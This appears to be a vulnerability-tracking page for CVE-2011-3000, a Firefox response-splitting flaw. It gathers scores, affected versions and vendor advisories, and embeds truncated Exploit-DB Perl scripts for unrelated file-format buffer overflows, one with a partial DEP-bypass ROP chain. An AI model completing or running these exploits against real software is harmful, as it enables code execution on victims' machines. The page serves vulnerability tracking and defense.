CVE-2011-3000
published 2011-09-29CVE-2011-3000: Mozilla Firefox before 3.6.23 and 4.x through 6, Thunderbird before 7.0, and SeaMonkey before 2.4 do not properly handle HTTP responses that contain multiple…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EPSS
2.02%
78.9th percentile
Mozilla Firefox before 3.6.23 and 4.x through 6, Thunderbird before 7.0, and SeaMonkey before 2.4 do not properly handle HTTP responses that contain multiple Location, Content-Length, or Content-Disposition headers, which makes it easier for remote attackers to conduct HTTP response splitting attacks via crafted header values.
Affected
176 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 3.6.22 | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat4.3MEDIUM
vendor_ubuntu3.5LOW
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Mozvoikko, ubufox, webfav update
vendor_ubuntu·2011-10-04·CVSS 3.5
[LOW] Mozvoikko, ubufox, webfav update
Title: Mozvoikko, ubufox, webfav update
Summary: This update provides packages compatible with Firefox 7.
USN-1222-1 fixed vulnerabilities in Firefox. This update provides updated
packages for use with Firefox 7.
Original advisory details:
Benjamin Smedberg, Bob Clary, Jesse Ruderman, Bob Clary, Andrew McCreight,
Andreas Gal, Gary Kwong, Igor Bukanov, Jason Orendorff, Jesse Ruderman, and
Marcia Knous discovered multiple memory vulnerabilities in the browser
rendering engine. An attacker could use these to possibly execute arbitrary
code with the privileges of the user invoking Firefox. (CVE-2011-2995,
CVE-2011-2997)
Boris Zbarsky discovered that a frame named "location" could shadow the
window.location object unless a script in a page grabbed a reference to the
true object before the
Ubuntu
Firefox vulnerabilities
vendor_ubuntu·2011-09-29·CVSS 3.5
CVE-2011-3005 [LOW] Firefox vulnerabilities
Title: Firefox vulnerabilities
Summary: Firefox could be made to crash or possibly run programs as your login if it
opened a malicious website.
Benjamin Smedberg, Bob Clary, Jesse Ruderman, Bob Clary, Andrew McCreight,
Andreas Gal, Gary Kwong, Igor Bukanov, Jason Orendorff, Jesse Ruderman, and
Marcia Knous discovered multiple memory vulnerabilities in the browser
rendering engine. An attacker could use these to possibly execute arbitrary
code with the privileges of the user invoking Firefox. (CVE-2011-2995,
CVE-2011-2997)
Boris Zbarsky discovered that a frame named "location" could shadow the
window.location object unless a script in a page grabbed a reference to the
true object before the frame was created. This is in violation of the Same
Origin Policy. A malicious website could possi
Red Hat
Mozilla: Defense against multiple Location headers due to CRLF Injection (MFSA 2011-39)
vendor_redhat·2011-09-28·CVSS 4.3
CVE-2011-3000 [MEDIUM] Mozilla: Defense against multiple Location headers due to CRLF Injection (MFSA 2011-39)
Mozilla: Defense against multiple Location headers due to CRLF Injection (MFSA 2011-39)
Mozilla Firefox before 3.6.23 and 4.x through 6, Thunderbird before 7.0, and SeaMonkey before 2.4 do not properly handle HTTP responses that contain multiple Location, Content-Length, or Content-Disposition headers, which makes it easier for remote attackers to conduct HTTP response splitting attacks via crafted header values.
Package: seamonkey (Red Hat Enterprise Linux 4) - Affected
Package: thunderbird (Red Hat Enterprise Linux 4) - Affected
Package: firefox (Red Hat Enterprise Linux Extended Update Support 5.7) - Affected
Package: thunderbird (Red Hat Enterprise Linux Extended Update Support 5.7) - Affected
Package: firefox (Red Hat Enterprise Linux Extended Update Support 6.1) - Affected
Pac
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu·2011-09-28·CVSS 3.5
CVE-2011-2995 [LOW] Firefox and Xulrunner vulnerabilities
Title: Firefox and Xulrunner vulnerabilities
Summary: Multiple vulnerabilities have been fixed in Firefox and Xulrunner.
Benjamin Smedberg, Bob Clary, Jesse Ruderman, and Josh Aas discovered
multiple memory vulnerabilities in the browser rendering engine. An
attacker could use these to possibly execute arbitrary code with the
privileges of the user invoking Firefox. (CVE-2011-2995, CVE-2011-2996)
Boris Zbarsky discovered that a frame named "location" could shadow the
window.location object unless a script in a page grabbed a reference to the
true object before the frame was created. This is in violation of the Same
Origin Policy. A malicious website could possibly use this to access
another website or the local file system. (CVE-2011-2999)
Mark Kaplan discovered an integer underflow in
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2011-09-28·CVSS 3.5
CVE-2011-2372 [LOW] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Summary: Multiple vulnerabilities were fixed in Thunderbird.
Benjamin Smedberg, Bob Clary, Jesse Ruderman, and Josh Aas discovered
multiple memory vulnerabilities in the Gecko rendering engine. An
attacker could use these to possibly execute arbitrary code with the
privileges of the user invoking Thunderbird. (CVE-2011-2995, CVE-2011-2996)
Boris Zbarsky discovered that a frame named "location" could shadow the
window.location object unless a script in a page grabbed a reference to the
true object before the frame was created. This is in violation of the Same
Origin Policy. A malicious E-Mail could possibly use this to access the
local file system. (CVE-2011-2999)
Mark Kaplan discovered an integer underflow in the SpiderMonkey JavaScript
engine. An att
Cisco
Cisco Nexus 5000 and 3000 Series Switches Access Control List Bypass Vulnerability
vendor_cisco
CVE-2011-2581 Cisco Nexus 5000 and 3000 Series Switches Access Control List Bypass Vulnerability
CVE-2011-2581: Cisco Nexus 5000 and 3000 Series Switches Access Control List Bypass Vulnerability
A vulnerability exists in Cisco Nexus 5000 and 3000 Series Switches that may allow traffic to bypass deny statements in access control lists (ACLs) that are configured on the device. Cisco has released software updates that address this vulnerability. A workaround is available to mitigate this vulnerability. This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20110907-nexus .
Bug IDs: CSCto09813, CSCtr61490
GHSA
GHSA-mm6x-3vj3-q4jp: Mozilla Firefox before 3
ghsa_unreviewed·2022-05-17
CVE-2011-3000 [MEDIUM] CWE-94 GHSA-mm6x-3vj3-q4jp: Mozilla Firefox before 3
Mozilla Firefox before 3.6.23 and 4.x through 6, Thunderbird before 7.0, and SeaMonkey before 2.4 do not properly handle HTTP responses that contain multiple Location, Content-Length, or Content-Disposition headers, which makes it easier for remote attackers to conduct HTTP response splitting attacks via crafted header values.
No detection rules found.
Exploit-DB
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
exploitdb·2011-11-30
CVE-2011-5173 Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
---
#Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7
#Tested on GOG.com copy of FlatOut. Exception offset = 61616161
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..
my $file = "playlist_0.bed";
my $head = "Title = \"";
my $junk = "a" x 3000 . "\"\r";
my $tail = "Loop = {" . "\r}";
open($File, ">$file");
print $File $head.$junk.$tail;
close($FILE);
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";
Exploit-DB
Muse Music All-in-One 1.5.0.001 - '.pls' Local Buffer Overflow (DEP Bypass)
exploitdb·2011-09-26
Muse Music All-in-One 1.5.0.001 - '.pls' Local Buffer Overflow (DEP Bypass)
Muse Music All-in-One 1.5.0.001 - '.pls' Local Buffer Overflow (DEP Bypass)
---
#!/usr/bin/perl
#
#[+]Exploit Title: Muse Music All-In-One PLS File Buffer Overflow Exploit(DEP Bypass)
#[+]Date: 25\09\2011(DD\MM\YYYY)
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Muse-Music-All-In-One/3000-2141_4-10070288.html
#[+]Version: 1.5.0.001
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#[+]Info:
#This exploit can be universal, if the buffer to overwrite EIP stay for all Windows systems equal. ;)
#To reproduce click in File -> Open... -> Select Exploit.pls and see the Calc.
#
use strict;
use warnings;
print q{
Created By C4SS!0 G0M3S
E-mail [email protected]
Blog net-fuzzer.blogspot.com
};
print "\n\t\t[+]Creating Exploit File...\n";
sleep(2);
#######
Exploit-DB
ZipX 1.71 - '.ZIP' File Buffer Overflow
exploitdb·2011-09-05
ZipX 1.71 - '.ZIP' File Buffer Overflow
ZipX 1.71 - '.ZIP' File Buffer Overflow
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit
#[+]Date: 05\09\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipX/3000-2250_4-10518937.html
#[+]Version: v1.71
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
#Reproduce:
#Open the zip file, after click in "Encrypt", type you password and click in "Ok" BOOM!!!
#See the calc.exe
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipX for Windows v1.71 ZIP File Buffer Overflow Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail louredo_\@hotmail.com\n";
print "\t\tSite http://net-fuzzer.blogspot.com/\n\n";
sleep(1);
print "\t\t[+]Creating ZIP File...\n";
sleep(1);
my
Exploit-DB
D.R. Software Audio Converter 8.1 - DEP Bypass
exploitdb·2011-08-13
D.R. Software Audio Converter 8.1 - DEP Bypass
D.R. Software Audio Converter 8.1 - DEP Bypass
---
#!/usr/bin/perl
#
#[+]Exploit Title: D.R. Software Audio Converter 8.1 DEP Bypass Exploit
#[+]Date: 13\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
#[+]Found By: Sud0 from Corelan Team(http://www.exploit-db.com/exploits/13760/) or also created KedAns-Dz(http://1337day.com/exploits/16248)
#[+]Version: 8.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
print q{
Created By C4SS!0 G0M3S
E-mail [email protected]
Site net-fuzzer.blogspot.com
};
print "\n\t\t[+]Creating Exploit File...\n";
sleep(2);
#####################################ROP FOR LoadLibraryA##############################
my $rop = pack('V',0x00430076); # POP ECX # RETN
$rop .= pack('V',
Exploit-DB
ZipGenius 6.3.2.3000 - '.zip' Local Buffer Overflow
exploitdb·2011-07-08
ZipGenius 6.3.2.3000 - '.zip' Local Buffer Overflow
ZipGenius 6.3.2.3000 - '.zip' Local Buffer Overflow
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipGenius v6.3.2.3000 .ZIP File Buffer Overflow Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freewarefiles.com/ZipGenius-V_program_3344.html
#[+]Version: 6.3.2.3000
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipGenius v6.3.2.3000 .ZIP File Buffer Overflow Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(2);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 =
Exploit-DB
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
exploitdb·2011-07-08
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html
#[+]Version: v5.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02
Exploit-DB
OpenMyZip 0.1 - '.zip' Remote Buffer Overflow
exploitdb·2011-05-02
OpenMyZip 0.1 - '.zip' Remote Buffer Overflow
OpenMyZip 0.1 - '.zip' Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/47678/info
OpenMyZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
OpenMyZip 0.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
#
#
#[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability
#[+]Date: 02\05\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html
#[+]Version: v0.1
#[+]Tested On: WIN-XP SP3 Brazil Portuguese
#[+]CVE: N/A
#
#
#
use strict;
use warnings;
my $filename =
http://lists.opensuse.org/opensuse-security-announce/2011-11/msg00020.htmlhttp://lists.opensuse.org/opensuse-updates/2011-10/msg00002.htmlhttp://secunia.com/advisories/46315http://www.debian.org/security/2011/dsa-2312http://www.debian.org/security/2011/dsa-2313http://www.debian.org/security/2011/dsa-2317http://www.mandriva.com/security/advisories?name=MDVSA-2011:139http://www.mandriva.com/security/advisories?name=MDVSA-2011:140http://www.mandriva.com/security/advisories?name=MDVSA-2011:141http://www.mandriva.com/security/advisories?name=MDVSA-2011:142http://www.mozilla.org/security/announce/2011/mfsa2011-39.htmlhttp://www.redhat.com/support/errata/RHSA-2011-1341.htmlhttps://bugzilla.mozilla.org/show_bug.cgi?id=655389https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14361http://lists.opensuse.org/opensuse-security-announce/2011-11/msg00020.htmlhttp://lists.opensuse.org/opensuse-updates/2011-10/msg00002.htmlhttp://secunia.com/advisories/46315http://www.debian.org/security/2011/dsa-2312http://www.debian.org/security/2011/dsa-2313http://www.debian.org/security/2011/dsa-2317http://www.mandriva.com/security/advisories?name=MDVSA-2011:139http://www.mandriva.com/security/advisories?name=MDVSA-2011:140http://www.mandriva.com/security/advisories?name=MDVSA-2011:141http://www.mandriva.com/security/advisories?name=MDVSA-2011:142http://www.mozilla.org/security/announce/2011/mfsa2011-39.htmlhttp://www.redhat.com/support/errata/RHSA-2011-1341.htmlhttps://bugzilla.mozilla.org/show_bug.cgi?id=655389https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14361
2011-09-29
Published